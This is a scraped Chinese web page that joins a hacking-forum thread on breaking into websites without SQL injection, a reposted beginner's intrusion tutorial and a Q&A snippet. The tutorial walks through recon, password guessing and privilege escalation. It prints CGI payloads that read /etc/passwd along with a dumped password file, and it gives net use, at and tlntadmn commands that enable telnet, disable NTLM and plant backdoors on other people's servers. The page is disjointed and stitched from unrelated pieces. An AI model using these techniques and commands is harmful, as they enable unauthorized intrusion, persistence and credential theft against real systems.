如何怎么入侵网站站

只需一步,快速开始
后使用快捷导航没有帐号?
查看: 1130|回复: 10
没有注入点的网站怎么入侵?
签到天数: 589 天[LV.9]以坛为家II
有个网站扫到了后台但是没有注入点 该怎么渗透他?有什么其他的入侵方式不?XSS?
sql注入大部分情况下是要拿到后台管理的权限 然后找个上传的地方
之前我遇到过很多也没有sql注入的站 可以考虑 如下方式
首先是旁注 一个服务器除非是超大型的 自己独立一个服务器 否则可以从该ip下的其它网站下手
得到了服务器的权限自然也得到了你想要的该网站(服务器上就是个不同路径的文件夹)的权限
或者采取爆目录 用wwwscan挂个超级字典 就算扫不出数据库的地址 扫出个些明暗目录也是八九不离十
再或者扫端口 看看开了 ...
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 195 天[LV.7]常住居民III
sql注入大部分情况下是要拿到后台管理的权限 然后找个上传的地方
之前我遇到过很多也没有sql注入的站 可以考虑 如下方式
首先是旁注 一个服务器除非是超大型的 自己独立一个服务器 否则可以从该ip下的其它网站下手
得到了服务器的权限自然也得到了你想要的该网站(服务器上就是个不同路径的文件夹)的权限
或者采取爆目录 用wwwscan挂个超级字典 就算扫不出数据库的地址 扫出个些明暗目录也是八九不离十
再或者扫端口 看看开了哪些端口 再冲端口下手
网站入侵后期 免杀是难点
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 4 天[LV.2]偶尔看看I
不要停留在网页入侵的层面上嘛,HTML写的静态网站据我所知是不能sql注入的,XSS是可以的。
你可以从目标服务器下手啊,扫面他的服务器,找应用程序漏洞,以及系统服务漏洞嘛,扫描系统漏洞的免费原件有openvas,在linux下的,使用远吗安装就可以了】
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 589 天[LV.9]以坛为家II
sql注入大部分情况下是要拿到后台管理的权限 然后找个上传的地方
之前我遇到过很多也没有sql注入的站 可以 ...
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 195 天[LV.7]常住居民III
渗透路漫漫兮拿webshell
webshell不免杀兮一去不复还
webshell我知道 不就是 网站域名么。&
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 195 天[LV.7]常住居民III
渗透路漫漫兮拿webshell
webshell不免杀兮一去不复还
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 11 天[LV.3]偶尔看看II
可以换换别的思路,从上传、web容器等方面入手。
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 1 天[LV.1]初来乍到
入侵网页不是最终的目的,直接拿到服务器的管理权限,还怕网站拿不下来吗?
网站入侵并不是只有注入点的,看下是什么CMS做的,WWWSCAN扫下数据库地址等等,默认密码,很多很多的.
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 4 天[LV.2]偶尔看看I
主站拿不下就看旁站,旁站也拿不下,试试0day
&&或许有弱口令--==
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
签到天数: 195 天[LV.7]常住居民III
楼主可以利用XSS来获取网站权限
如果您的【问题求助】得到满意的解答,请自行将分类修改为【已经解决】;如果想鼓励一下楼主或帮助到您的朋友,可以给他们【评分】鼓励;善用【论坛搜索】功能,那里可能有您想要的答案!
•••(
Powered by主题不存在!
请输入姓名:
请输入对方邮件地址:
您的反馈对我们至关重要!您现在的位置:&&&&&&&&&&&&&正文
如何入侵网站
  网站入侵:1,确定目标,新手们就是拿着扫描器乱扫一通,但高手们选定一个目标一定攻下为止,因为在他们心中没有系统是没有漏洞的。下面是门户站小编针对网站入侵而整理的文章。很详细哦,赶快点下面的百度分享按钮把知识分享给你的朋友们吧。
  网站入侵
在看文章这之前想告诉新手们入侵一般的5个步骤: 1,确定目标,新手们就是拿着扫描器乱扫一通,但高手们选定一个目标一定攻下为止,因为在他们心中没有系统是没有漏洞的。 2,信息收集,一般的信息收集就是拿着扫描器扫,但我这次所要说的重点不在扫描器。 3,入侵,攻击。得到信息后一定要把信息整理后自己斟酌一下,确定入侵方针后就开支吧。 4,获得最高权限,如果一进去就获得了这一步就没了。 5,留后门,擦PP。一定要记住黑客准则,不修改系统文件,除非有利于下次的进入。 看完之后因该对信息收集有一定的概念了,我认为信息收集在整个入侵中占有非常重要的作用,没有这一步,入侵基础就是靠信息收集。废话少说,切入正题。 首先讲讲收集个人用户机子的方法。 第一种:首先当然是通过QQ了,我来举个例子。 山西省中国电信用户 218.26.33.***:4001 从上面的字你能发现什么信息呢?首先可以确定的是对方没装防火墙,没有把QQ默认的端口400X过滤掉,而且对方开了两个QQ,因为第一个QQ的默认端口是4000而他是4001,说明4000已经被占用。怎么样简单吧,这样就能得到对方机子的信息。反之如果对方的端口是高于4999以上的话旧说明对方装了放火墙或用了代理。这样只有采用别的方法入侵了。 第二种:接着就是利用dos自带的命令ping了,虽然只有几个字母,但功能不能小视。首先我们测试对方主机的速度。 C:\& Ping -n 50 192.168.1.1 pinging 192.168.1.1 winth 32 bytes of data reply from 192.168.1.1: bytes=32 time=50ms TTL=128 reply frome 192.168.1.1: bytes=32 time=50ms TTL=128 reply frome 192.168.1.1: bytes=32 time=50ms TTL=128 ………… packets: Sent =50,Received =48 lost =2 (4%)…………minimum = 40ms, Maximun = 51ms, Average = 46ms 从上面可以看出我给192.168.1.1发50个数据包。返回了48个,其中有两个丢失,返回速度最快为40ms,最慢为51ms,平均速度为46ms.TTL为128是NT系统。 记住一条:平均速度的值越小机子速度越快,反之就越慢。 第三种:就是在破不出密码时使用的,在QQ上跟你要入侵的人说,把生日和自己的名字或女朋友的名字和网名套出来。然后重新排列做成字典,之后的事就不用说了吧。 接下来就是服务器了,我不想教怎么用扫描器获得信息,因为网上这类的教程多如牛毛。 第1种:确定IP~,这一步最关键了,很多人都用ping来确定,但我还有一个更加准确的方法。在2K的CMD输入nclookup 在&后面输入要查的网址 www.skying.net Name:www.skying.net address:XXX.XXX.XXX.XXX 然后输入server skying.net显示出来的IP就www.sking.net总 服务器的地址了。 第2种:确定对方的系统,和服务版本。ping一般都不管用了,很少有傻B管理员连放火墙都不装的。首先看看对方有无开21和23 ,开了23就在cmd下输入 telnet XXX.XXX.XXX.XXX Red Hat linux release 7.1 (Seawolf) Kernel 2.42-2 on an i686 login: 很明显吧,对方主机是 linux ,版本是Kernel 2.42,快去安全焦点查查有什么漏洞吧。 记住一条:开的服务越多漏洞就越多, 就着就是测试80端口了。 telnet XXX.XXX.XXX.XXX 多按几次回车后出现: HEAD /HTTP /1.1 HTTP/1.1 200 OK ………… server:Apache/1.3/20(UNIX)PHP/4.0.6 ………… 注意到 server:Apache/1.3/20(UNIX)PHP/4.0.6 ,很明显的说出服务器的版本,Apache 1.3,很熟悉吧,还等什么上啊!当然有些管理员也会做屏蔽或改掉这些banner. FTP到对方21端口后判断方法跟这差不多,自己琢磨琢磨吧。 第3种:踩点。入侵一个网站之前一定先把整个网站结构摸清楚,特别注意的如果发现网站上有某个页面或论坛出现问题可以利用时,要看清是不是在网站本目录上,经典的入侵,大家可以参考/xhacker/xhacker.rar xhacker的关于没有弱口令打全了SP3+有防火墙的一段攻击录象 其实这种机器的突破口就在于他的80,看看有没有可以利用的地方 这点可以参照前面的几个帖子(关于80入侵的) 第4种 如果确定对方是IIS话,我们来测试一下他哪个目录开了执行权限。从浏览器里输入/dir/shuangfeng.dll 是对方的网地址。dir是我们要判断的目录,shuangfeng.dll是我随便起的名字,服务器上没有这个文件如果返回的信息是HTTP 500 -内部服务器错误,说明这个目录的权限是开着的。关于怎么样写权限我下次再讲,现在就到这,有错误的地方请大家指出
  网站入侵
  黑客永远是走在技术尖端的人,永远追求最高和最尖端的技术并达到狂热的程度,才能被人称为黑客,黑客是别人给的评价,而不是自封的(援引NetDemon的话,我非常赞同)。我们大部分人都不能称之为黑客,所以文中我用入侵者这个词语。。看着linux里面的源代码,再看看他们的作者,很少能看到中国人的身影,中国的黑客们还有很长的路要走。   此文针对新手,“真正”黑客级别的就不用看了,这篇文章对于你们来说是太菜了。我想上网多年的朋友们一定记得coolfire的入侵教程,那是一篇揭开入侵者神秘面纱的初级文章。无数刚学会拨号上网的少年,看着coolfirede文章,依然热血沸腾。我也不例外,它让我从此迷恋上了网络。可是许多新手和当年的我一样,看完网络上入侵的教学篇后依然不知所措。为了让大家节省时间,少走弯路,我就结合我的经验来谈谈普通的入侵方式。网友们看过此文后,千万不要做违法的事,因为法律是无情的。   首先,我们要确立目标。要尽量收集目标的信息,如目标上运行的是什么操作系统,它开了哪些服务等。我们最好用nmap扫描器对目标进行扫描,顺便提一句,nmap扫描器是unix平台下扫描器,新手们最好能熟练的使用它(见Nmap扫描说明)。以下是对某目标扫描的结果。我们分析一下。 Interesting ports on info.net (xxx.xxx.xxx.xxx): (The 1515 ports scanned but not shown below are in state: closed) Port State Service (RPC) 7/tcp open echo 9/tcp open discard 13/tcp open daytime 19/tcp open chargen 21/tcp open ftp 23/tcp open telnet 37/tcp open time 79/tcp open finger &-------收集用户信息 111/tcp open sunrpc (rpcbind V2-4) 515/tcp open printer 540/tcp open uucp 1103/tcp open xaudio 4045/tcp open lockd (nlockmgr V1-4) 6000/tcp open X11 6112/tcp open dtspc 7100/tcp open font-service 8080/tcp open http-proxy 32774/tcp open sometimes-rpc11 (status V1) 32775/tcp open sometimes-rpc13 (ttdbserverd V1)&----可能有溢出漏洞 32776/tcp open sometimes-rpc15 (dmispd V1) 32779/tcp open sometimes-rpc21 (ttsession V1-4)   TCP Sequence Prediction: Class=random positive increments Difficulty=33704 (Worthy challenge) Sequence numbers: 45A532 7D6EB AF5C1 Remote operating system guess: Solaris 2.6 - 2.7&-------所用的操作系统 OS Fingerprint: TSeq(Class=RI%gcd=1%SI=83A8) T1(Resp=Y%DF=Y%W=2297%ACK=S++%Flags=AS%Ops=NNTNWME) T2(Resp=N) T3(Resp=N) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S%Flags=AR%Ops=) PU(Resp=Y%DF=Y%TOS=0%IPLEN=70%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)   通过扫描,我们可以看到这是一台solaris 2.6-2.7(sun microsystem公司的服务器),服务比较多,其实对于这个公司来说,根本没有必要开这么多服务,我敢这么说,有些服务他们可能都不知道是什么,可是这么多服务对我们的入侵就比较有好处。有些服务当然对我们也没有什么用,如daytime,xiaudio等服务。有finger服务,我们可以得到用户信息,输入命令如finger -l @xxx.xxx.xxx.xxx,如果没有人登陆到这台服务器的话,你finger不到有用的信息,别灰心,sun服务器的finger服务有个bug,那就是你输入finger 12@xxx.xxx.xxx.xxx(只要@前面是数字的就可以了),你就可以得到所有登陆过这台服务器的用户信息。以下是finger的结果: Login Name TTY Idle When Where daemon ??? & . . . . & bin ??? & . . . . & sys ??? & . . . . & www ??? pts/1 xxx.xxx.xxx.xxx richard ??? & . . . . & fashion ??? & . . . . & liu1971 ??? & . . . . & root ??? & . . . . & wangjin ??? & . . . . & zhanghj ??? pts/2   国内服务器上的用户比较少,不象一些老外的服务器,用户多的不得了。有了用户名,你就可以telnet试试了,看能不能碰到几个傻瓜用户。如果碰巧进入了,你就happy了,即使是普通用户,可离root已不是很遥远了。这台服务器就是这种情况,我用liu1971这个用户进入了,因为他的密码和用户名一样,然后我通过本地漏洞提升为root,就是sun的mailx程序,这是个邮件服务程序,它就相当于linux的mail程序,2001年它被发现有溢出漏洞,网管们要小心了。如果这招失败,就看看它的rpc服务了,因为sun的rpc远程溢出太可怕了,这几年层出不穷。这也是对付sun服务器的最有效的方法。拿此服务器为例,它的ttdbserverd守护进程就很有可能有溢出漏洞,如果这台服务器没有patch的话。在上我们就可以找到它的溢出程序。哎,我们利用的漏洞和程序基本上是老外们写的。就这样,运气好的话,几分钟就搞定了一台服务器,再不行,你就用暴力法了,前提是你很有钱,搞个程序自动测试用户的密码了。这次中美网络大战,老美的那个专门黑中国sun服务器的人,就是利用了sun的sadmind远程溢出漏洞,这是一个1999发现的漏洞,可是他在国内的服务器上屡屡得手,我真不知道国内的这些部门的网络管理人员是干什么的。能用的起sun服务器的都是些重要部门或大公司,他们的硬件这么好,可人员素质却跟不上,用人制度真是差劲。对于新手们来说关键的一点是收集到足够的信息,然后利用一些已知的漏洞利用程序。   怎么得到一个用户名和密码呢?方法一:使用小榕的流光软件。该软件界面友好,操作简单,极易上手。流光的ftp探测对win系列的ftp,sun的proftp都比较好,你可以用流光测试,看能不能得到一个普通用户。然后用该用户登陆,一般情况该用户在系统中都有一个shell,如果能进入系统,哈,你就准备夺取root权限吧。从我以往的经验看,许多系统的本地漏洞根本从没修补过,很轻松的就成为root了。方法二:试试一些cgi漏洞。例如/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd/opendir.php?requesturl=/etc/passwd ,等等。这都是已知的一些cgi漏洞。当然,前提是这些傻瓜网站有这些cgi脚本,且没有修补。我们可以用x-scan扫描器,用它的cgi选项。如果大家实在想试试身手的话,我推荐一傻瓜法。因为我想对于新手而言,能成功的进入他入侵生涯的第一台服务器是对他极大的鼓舞。这个网站去,这是一个搜索引擎。例如你输入/opendir.php进行搜索,就会找到一大堆用这个cgi的网站,你就慢慢实验了,很多网站没打补丁了。例如等一些站点,不过很多都是老外的。呵呵,中国的网络不发达也有好处。以下是该网站的passwd。  root::0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root: games:*:12:100:games:/usr/games: gopher:*:13:30:gopher:/usr/lib/gopher-data: ftp:*:14:50:FTP User:/home/ftp: nobody:*:99:99:Nobody:/: httpd:x::httpd:/web:/bin/bash 在telnet服务中如何最快速关闭Ntlm验证 如果你得到了一个主机的Admin权限(如何得到admin权限不在本文的讨论范围),下一步你应该做的大概就是以下几点: ①.打开telnet 服务。 ②.上传常用工具。比如:查杀线程工具、端口侦察工具、Sniffer工具,漏洞扫描工具…(反对上传木马,目标太大)。 ③.设置一个系统后门。推荐:在iis中设置一个虚拟目录Msado,目录:X:winntsystem32;权限:目录浏览、执行、写、读。 ④.用Sql或nt的AT命令增加一个计划任务,在一个月后重复第③项操作。 我下面要说的就是在打开telnet 服务中会出现的问题。 1. 在服务器端打开telnet 服务 D:& net use \203.56.XX.XXipc$ "onenight" /user:"onenight" 命令成功完成。 D:&net use z: \202.56.XX.XXc$ 命令成功完成。 D:&copy con z:a.bat net start telnet ^Z 已复制 1 个文件。 D:&at \203..56.XX.XX 01:05 "c:a.bat" 命令成功完成。 2.01:05后在客户端用telnet 连接上去,你十有八九得到的如下的提示: Server allows Ntlm Authentication only Server has closed connection 原来Nt默认的telnet 服务的身份验证是基于Ntlm的,可否关闭这种验证机制,当然可以:小榕在他的流光软件中附带了一个关闭Ntlm身份验证的软件Ntlm.exe ,只要在服务器的运行Ntlm.exe,就可以完成这个操作。这个方法好虽好可也有缺点:一是上传一个文件有点麻烦;二来如果服务器端有病毒防火墙等东东可能会删除Ntlm.exe 。其实有一个更简单的方法: ①. 在服务器端建立一个文本文件: D:&copy con z:1.txt 3 7 y 0 y 0 0 ^Z 已复制 1 个文件。 ②.D:&copy con z:b.bat type c:1.txt |tlntadmn.exe ^Z 已复制 1 个文件。 D:&at \203..56.XX.XX 01:15 "c:b.bat" 命令成功完成。 为使修改生效要停止Telnet服务,在重新启动Telnet 服务一次。 01:15后就可以用telnet顺利连接上去。 这个方法的原理是利用NT本身自带的telnet 服务管理工具:tlntadmn.exe,用管道符|将ntlm身份验证关闭。有兴趣的朋友可以在本机运行tlntadmn,看看他到底提供了哪些功能。
(宜春门户站综合,欢迎您的垂阅-.cn)
责任编辑:Lucky
姓名昵称:
网友点击排行
网友评论排行
首先映入眼帘的当然还是Tt周年纪念版机箱怎样入侵网站_百度知道
怎样入侵网站
用户名账号,后台有了,大马小马一应俱全,然后要入侵的网站本人学了一年的C、端口扫描器全有了
提问者采纳
唉,黑帽论坛看看,,建议你到论坛学习学习
提问者评价
虽然对我没有用,但放眼望去,就你一人回答了
来自团队:
其他类似问题
1人觉得有用
为您推荐:
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁

我要回帖

更多关于 怎么入侵网站 的文章

 

随机推荐